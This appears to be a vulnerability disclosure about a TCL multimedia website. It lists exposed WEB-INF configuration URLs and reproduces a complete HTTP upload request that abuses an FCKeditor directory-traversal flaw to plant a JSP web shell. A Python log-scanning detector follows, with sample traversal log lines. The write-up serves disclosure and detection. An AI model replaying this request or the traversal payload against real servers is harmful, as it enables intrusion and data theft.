An improperly configured TCL site allows getshell, which can then be used to reach the intranet.
http://multimedia.tcl.com/WEB-INF/web.xml
web.xml is accessible.
Follow the steps shown in the figure
http://multimedia.tcl.com/WEB-INF/classes/applicationContext.xml
http://multimedia.tcl.com/WEB-INF/classes/hibernate.cfg.xml
The intranet database connection settings can be found there.
Every class file can be downloaded, which can leak the source code of the whole site.
The key point is here:
FCKeditor
On accessing it, it turns out to be a vulnerable version that allows directory traversal.
POST /lokosuite/module/core/htmleditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../en/home/ HTTP/1.1
Host: multimedia.tcl.com
Proxy-Connection: keep-alive
Content-Length: 7338
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://multimedia.tcl.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.3 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMqgpH9KZNXlFibX4
Referer: http://multimedia.tcl.com/lokosuite/module/core/htmleditor/editor/filemanager/browser/default/frmupload.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: JSESSIONID=EC6CB4E9F7907F950BB61462522B06DF; __utmt=1; __utma=168697661.1185858053.1421290181.1421290181.1421290181.1; __utmb=168697661.8.10.1421290181; __utmc=168697661; __utmz=168697661.1421290181.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

------WebKitFormBoundaryMqgpH9KZNXlFibX4
Content-Disposition: form-data; name="NewFile"; filename="indexs.jsp"
Content-Type: application/octet-stream
This request uploads a shell directly.
Solution:
Prohibit access to the configuration files.
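To find the two request patterns above in web-server logs, the following detection sketch can be used. It is an added example, not part of the original report; the combined access-log format, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request and status fields of a combined-format access log (format is an assumption).
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
PROTECTED_RE = re.compile(r"/(WEB-INF|META-INF)(/|$)", re.IGNORECASE)

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LINE_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    path = decode(parts.path)
    findings = []
    # Deployment descriptors and classes must never be served to a client.
    if PROTECTED_RE.search(path):
        findings.append("webinf-served" if m.group("status") == "200" else "webinf-probe")
    # File-manager connector call whose CurrentFolder climbs out of the upload root.
    lowered = path.lower()
    if "/filemanager/" in lowered and "/connectors/" in lowered:
        query = {k.lower(): v[0] for k, v in parse_qs(parts.query).items()}
        folder = decode(query.get("currentfolder", "")).replace("\\", "/")
        if ".." in folder.split("/"):
            findings.append("connector-traversal")
    return findings

def scan(lines):
    """Return (index, findings) for every line that triggered a rule."""
    return [(i, f) for i, line in enumerate(lines) if (f := classify(line))]

CONNECTOR = "/lokosuite/module/core/htmleditor/editor/filemanager/browser/default/connectors/jsp/connector"
# Constructed log lines (documentation IP ranges, made-up timestamps and sizes).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2000:10:00:01 +0000] "GET /WEB-INF/web.xml HTTP/1.1" 200 4312',
    '203.0.113.7 - - [01/Jan/2000:10:00:09 +0000] "GET /WEB-INF/classes/hibernate.cfg.xml HTTP/1.1" 404 0',
    f'203.0.113.7 - - [01/Jan/2000:10:02:30 +0000] "POST {CONNECTOR}?Command=FileUpload&Type=Image&CurrentFolder=/../../en/home/ HTTP/1.1" 200 120',
    f'198.51.100.4 - - [01/Jan/2000:10:05:00 +0000] "POST {CONNECTOR}?Command=FileUpload&Type=Image&CurrentFolder=/photos/ HTTP/1.1" 200 118',
    f'198.51.100.4 - - [01/Jan/2000:10:06:00 +0000] "POST {CONNECTOR}?Command=FileUpload&Type=Image&CurrentFolder=%2F%252e%252e%2Fen%2F HTTP/1.1" 200 118',
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE):
        print(index, findings)
```

A "webinf-served" hit means the configuration file was actually returned and should be treated as disclosed; "webinf-probe" means the request was made but the server did not answer with status 200.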